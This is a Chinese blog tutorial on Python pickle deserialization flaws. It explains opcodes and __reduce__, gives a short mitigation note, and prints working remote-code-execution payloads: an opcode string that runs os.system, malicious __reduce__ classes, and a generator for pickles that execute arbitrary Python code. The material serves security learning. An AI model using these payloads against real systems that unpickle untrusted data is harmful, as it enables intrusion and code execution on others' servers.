Python 反序列化漏洞学习笔记

最新推荐文章于 2023-04-17 11:11:42 发布
最新推荐文章于 2023-04-17 11:11:42 发布
阅读量307 收藏
点赞数
分类专栏: python 文章标签: 字符串 python java 编程语言 正则表达式
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/pythonputao/article/details/110951523
版权

前言

Python 中有很多能进行序列化的模块,比如 Json、pickle/cPickle、ShelveMarshal

一般 pickle 模块较常使用

在 pickle 模块中 , 常用以下四个方法

  • pickle.dump(obj, file) : 将对象序列化后保存到文件
  • pickle.load(file) : 读取文件, 将文件中的序列化内容反序列化为对象
  • pickle.dumps(obj) : 将对象序列化成字符串格式的字节流
  • pickle.loads(bytes_obj) : 将字符串格式的字节流反序列化为对象
    注意:file文件需要以 2 进制方式打开,如 wbrb

序列化

  1. 从对象提取所有属性,并将属性转化为键值对
  2. 写入对象的类名
  3. 写入键值对

看到下面这个序列化例子

py3 序列化后结果为:

b'\x80\x04\x954\x00\x00\x00\x00\x00\x00\x00\x8c\x08__main__\x94\x8c\x04Test\x94\x93\x94)\x81\x94}\x94(\x8c\x04name\x94\x8c\x051ndex\x94\x8c\x03age\x94K\x12ub.'

py2 序列化后结果为:

(i__main__
Test
p0
(dp1
S'age'
p2
I18
sS'name'
p3
S'1ndex'
p4
sb.

这么一大串字符代表什么意思呢?可以简单的与 PHP 反序列化结果做类比 ----> 特定的字符开头帮助解释器指明特定的操作或内容

实际上这是一串 PVM 操作码

以 py2 运行得到的序列化结果 其中某些行的开头的字符具有特殊含义

符号含义形式例子
c导入模块及其具体对象c[module]\n[instance]\ncos\nsystem\n
(左括号  
t相当于 ) ,与 ( 组合构成一个元组  
R表示反序列化时依据 reduce 中的方式完成反序列化,会避免报错这在反序列化漏洞中很重要很重要
S代表一个字符串S'string'\n 
p后面接一个数字,代表第n块堆栈 p0、p1
.表示结束. 

例如:

cos\nsystem\n(S'whoami'\ntR.

反序列化

  1. 获取 pickle 输入流,也就是上面说的 PVM 码
  2. 重建属性列表
  3. 根据类名创建一个新的对象
  4. 将属性复制到新的对象中

反序列化时,将字符串(pickle 流)转换为对象

与PHP 序列化相似,Python 序列化也是将对象转换成具有特定格式的 字符串(py2)或字节流(py3) ,以便于传输与存储,比如 session

但是在反序列化时又与 PHP 反序列化又有所不同:

  • PHP 反序列化要求源代码中必须存在有问题的类,要求是被反序列化的对象中存在可控参数,具体可看这里
  • 而 Python 反序列化不需要,其只要求被反序列化的字符可控即可造成 RCE,例如:
# Python2
import pickle
s ="cos\nsystem\n(S'whoami'\ntR."  # 将被反序列化的字符串
pickle.loads(s)  # 反序列化后即可造成命令执行,因此网站对要被反序列化的字符串应该做严格限制

在 Python 中,一切皆对象,因此能使用 pickle 序列化的数据类型有 很多

  • None、True 和 False
  • 整数、浮点数、复数
  • str、byte、bytearray
  • 只包含可封存对象的集合,包括 tuple、list、set 和 dict
  • 定义在模块最外层的函数(使用 def 定义,lambda 函数则不可以)
  • 定义在模块最外层的内置函数
  • 定义在模块最外层的类
  • 某些类实例,这些类的 __dict__ 属性值或 __getstate__() 函数的返回值可以被封存

其中文件、套接字、以及代码对象不能被序列化!

Why

Python 反序列化漏洞跟 __reduce__() 魔术方法相关

其类似于 PHP 对象中的 __wakeup() 方法,会在反序列化时自动调用

__reduce__() 魔术方法可以返回一个字符串或者时一个元组。其中返回元组时,第一个参数为 一个可调用对象 ,第二个参数为 该对象所需要的参数

When

关键问题就在 __reduce__ 方法第二种返回方式---元组。在反序列化时自动调用 __reduce__() 方法,该方法会自动调用返回值中的函数模块并执行

例如下面存的代码:

import pickle
import os

class Rce(object): 
    def __reduce__(self):
        return (os.system,('ipconfig',))

a = Rce()
b = pickle.dumps(a)
pickle.loads(b)  # 执行该语句进行反序列化,自动执行 __reduce__ 方法,并且执行 os.system('ipconfig')

注意点: 元类无法在反序列化时调用 __reduce__ 魔术方法 ,简单理解就是没有继承 object 的类

class A():
    pass  # 反序列化时不会调用 __reduce__ 方法
class B(object):
    pass  # 反序列化时会调用 __reduce__ 方法

由于 Python 反序列化时只需要被反序列化的字符串可控(而不需要源代码中存在有安全问题的类)便可造成 RCE

因此我们可以通过如下代码轻松构造 Payload:

import pickle
import os

class Rce(object): 
    def __reduce__(self):
        return (os.system,('ipconfig',))

a = Rce()
b = pickle.dumps(a)
print(b)

特性

  1. 看到如下两种不同的序列化结果:
import pickle
import os
class Rce(object):
	name = "1ndex"
a = Rce()
print(pickle.dumps(a))

结果:

ccopy_reg\n_reconstructor\np0\n(c__main__\nRce\np1\nc__builtin__\nobject\np2\nNtp3\nRp4\n.
import pickle
import os
class Rce(object):
	name = "1ndex"
	def __reduce__(self):
		return (os.system,("a",))
a = Rce()
print(pickle.dumps(a))

结果:

cposix\nsystem\np0\n(S'ifconfig'\np1\ntp2\nRp3\n.

然后用下面这个代码执行反序列化:

import pickle
str = "填写上面序列化后的结果"
pickle.loads(str)

一 对应的结果反序列化:

AttributeError: 'module' object has no attribute 'Rce'  # 报错

二 对应的结果反序列化成功

一般来说反序列化时如果源代码中没有对应的类 Rce ,是会直接报错的(也就是上面一的结果),但是为什么在反序列化二的时候却能成功呢?源代码中明明也没有这个 Rce 的类啊

当序列化以及反序列化的过程中碰到一无所知的扩展类型/类的时候,可以通过类中定义的 __reduce__ 方法来告知如何进行序列化或者反序列化

也就是说我们,只要在类中定义一个 reduce 方法,我们就能在反序列化时,让这个类根据我们在__reduce__ 中指定的方式进行序列化(也就会执行 return 中的恶意代码)

这应该就是大佬说的相似:

Python 除了能反序列化当前代码中出现的类(包括通过 import的方式引入的模块中的类)的对象以外,还能利用其彻底的面向对象的特性来反序列化使用 types 创建的匿名对象,这样的话就大大拓宽了我们的攻击面。

  1. 反序列化执行 reduce 魔术方法,在 return 时,回自动导入源代码中没有引入的模块,例如:
import pickle
s ="cos\nsystem\n(S'whoami'\ntR."  # 将被反序列化的字符串
pickle.loads(s)  # 实际上会执行 os.system('whoami'),但是可以看到源代码中并未导入 os 模块

Solution

  • 严格控制要被反序列化的字符串

利用

执行命令

import pickle
import os
class Rce(object):
	def __reduce__(self):
		return (commands.getoutput,("whoami",))
a = Rce()
print(pickle.dumps(a))

执行任意 Python 代码

import marshal
import base64

def code():
    # 这里放任意想执行的 Python 代码
    pass

print """ctypes
FunctionType
(cmarshal
loads
(cbase64
b64decode
(S'%s'
tRtRc__builtin__
globals
(tRS''
tR(tR.""" % base64.b64encode(marshal.dumps(code.func_code))

本文的文字及图片来源于网络,仅供学习、交流使用,不具有任何商业用途,如有问题请及时联系我们以作处理

想要获取更多Python学习资料可以加QQ:2955637827私聊或加Q群630390733大家一起来学习讨论吧!

pythonputao
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
python之关于round函数的bug
time_money的博客
03-22 1576
round()函数:此函数慎用!!! 作用:返回浮点数x的“奇进偶舍值”。 round() 方法的语法: round( x [, n] ) 参数: x – 数值表达式。 n – 数值表达式,表示保留小数点后的位数。 返回值: 返回浮点数x的“奇进偶舍值”。 注意:-------------- 该方法和python版本有关。 阅读python的文档,里面是这么写的: 在python2.7的doc中,round()的最后写着,“Values are rounded to the closest multipl
Python-其他-round()保留小数位时遇到的问题
pythonputao的博客
12-10 1601
最近有一个需求,原有整数计算,改成小数计算,保留一位小数。 于是按照需求,将数据结构由 int 改为 float ,计算时采用round()方法来保留小数位。 第一版代码如下: a = 0.1000001 b = round(a+0.1,1) c = 0 c += round(a,1) 复制代码 修改完成后进行测试,多次测试过程中发现,b 结果正确,但 c 明明已经使用了round(a,1)保留一位小数,但最后的结果会出现 0.30000000000000004 这样的结果。 实际上 c += r
Python中round(数,小数位)函数的小坑
m0_74184968的博客
04-17 391
if two multiples are equally close, rounding is done away from 0.” 保留值将保留到离上一位更近的一端(四舍六入),如果距离两端一样远,则保留到离0远的一边。简单的说就是,round(2.675, 2) 的结果,不论我们从python2还是3来看,结果都应该是2.68的,结果它偏偏是2.67,为什么?所以如果有项目是从py2迁移到py3的,可要注意一下round的地方(当然,还要注意/和//,还有print,还有一些比较另类的库)
python函数round()取整保留小数问题
rs勿忘初心的博客
01-11 2504
最近在Python中使用round()函数取整然后后处理乘以100时,发现了一个奇怪的问题,如下: >>> round(61 / 154 * 100, 2) 39.61 >>> >>> (round(61 / 154, 2) )* 100 40.0 >>> >>> round(61 / 54, 2) 1.13 >>> (round(61 / 54, 2) )* 100 112.9999999999
python除法保留两位小数,Python 中关于 round 函数的小坑
weixin_39996134的博客
03-27 622
>>>round(10.0/3,2)3.33>>>round(20/7)3第一个参数是一个浮点数,第二个参数是保留的小数位数,可选,如果不写的话默认保留到整数。这么简单的函数,能有什么坑呢?1、round的结果跟python版本有关我们来看看python2和python3中有什么不同:$ pythonPython2.7.8(default,Jun182015,1...
python反序列化漏洞 任意代码执行
01-20
这篇博客我将介绍 python反序列化漏洞 任意代码执行 那么怎么反序列化中运行任意代码呢? 首先要说说__reduce__这个魔术方法, 这个方法用来表明类的对象应当如何序列化, 当其返回tuple类型时就可以实现任意代码...
Java反序列化漏洞利用工具.zip
04-10
java反序列化漏洞利用工具包含jboss|weblogic,网上其实有很多,但是用别人的工具收30分是不是有点不厚道,所以我用自己的分下载下来,然后以最低分贡献给大家,上次没有审核通过,希望这次可以
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen
11-05
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen,里面的 jar 直接运行即可,用于 shiro 漏洞检测、修复验证等
Shiro反序列化漏洞检测工具
01-05
Shiro1.2.4及以下版本存在反序列化漏洞,该工具用于测试该漏洞
hive round函数 和decimal一起使用的时部分失效情况和解决办法,
csdn1949_406的博客
02-21 2076
hive round函数
Python总结:保留小数点任意位round函数不够精确
岁月求索
08-08 7086
QUESTION:Python总结:保留小数点任意位round函数不够精确 ANWSER: 目录 QUESTION:Python总结:保留小数点任意位round函数不够精确 ANWSER: 一:使用round函数保留小数位数 二:使用print("%.nf"%N) 三:使用print(format(N,".nf")) 一:使用round函数保留小数位数 该方法并不严格有效,...
Python 中保留指定位数小数用round就可以了吗?
Python_Ai_Road的博客
10-24 3966
在项目实践中,程序员经常会收到产品经理保留指定位数小数的需求。在Python语言中,我们通常会使用内置函数round来完成这个功能,保留指定位数的小数。round的用法非常简单。例如:那...
python中format函数取小数位_Python总结:保留小数点任意位round函数不够精确
weixin_29144945的博客
12-29 3384
QUESTION:Python总结:保留小数点任意位round函数不够精确ANWSER:目录二:使用print("%.nf"%N)三:使用print(format(N,".nf"))一:使用round函数保留小数位数该方法并不严格有效,当X小数位数n三:使用print(format(N,".nf"))print(round(2,2)) #2print(round(2.0,2...
31.关于round函数四舍六入五成偶保留小数(c++)
qq_61607790的博客
04-01 2664
1.基本用法: 对于小数而言,round()函数仅仅保留到整数位,即仅仅对小数点后一位四舍五入; a=1.3579 round(a)=1; a=13.579 round(a)=14; 2.round()函数原理: x=(int)(x+0.5)公式,故可以自己写出round()函数; #include<iostream> using namespace std; double round(double x) { return (int)(x+0.5); } 3.保留小数用法:保留
python:round()函数的舍入问题
demo_yo的博客
06-26 2974
一、round舍入 在python2.7的doc中,round()的最后写着,“Values are rounded to the closest multiple of 10 to the power minus ndigits; if two multiples are equally close, rounding is done away from 0.” 保留值将保留到离上一位更近的一端(四舍六入),如果距离两端一样远,则保留到离0远的一边。所以round(0.5)会近似到1,而round(-0.
Python四舍五入保留两位小数
热门推荐
不写代码的博客
03-18 1万+
出现问题 失败一:使用&quot;%.2f&quot;a = 1.335 print(&quot;%.2f&quot; % a) # 输出1.33 失败二:使用round()a = 1.335 print(round(a, 2)) # 输出1.33 失败三:使用Decimal()from decimal import Decimal a = 1.335 print(Decimal(a).quantize(D...
sqlsever数据库,更新某一列值保留两位小数,使用round函数,依旧超多小数位
weixin_43801836的博客
12-29 2674
问题描述,a表中新加一列costTax,把a表中现存的cost值除以1.06,保留两位小数保存到对应的costTax列中。 在同一个表a中,用一列值更新另外一列,update a set costTax= round(cost/1.06,2) 出现问题,赋值的一列还是超多位小数,??? 使用select costTax= round(cost/1.06,2) from a,得到的值为正确是两位小数。 但是为什么使用update更新到表中的值为不准确的没有保留位数的值??? 解决方案 因为..
python反序列化漏洞防御
最新发布
09-13
要防止Python反序列化漏洞,您可以采取以下几种措施: 1. 验证和过滤输入:在反序列化之前,验证和过滤所有传入的数据。确保只接受可信任和预期的数据,并拒绝任何可能包含恶意代码的输入。 2. 使用安全的反序列化...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值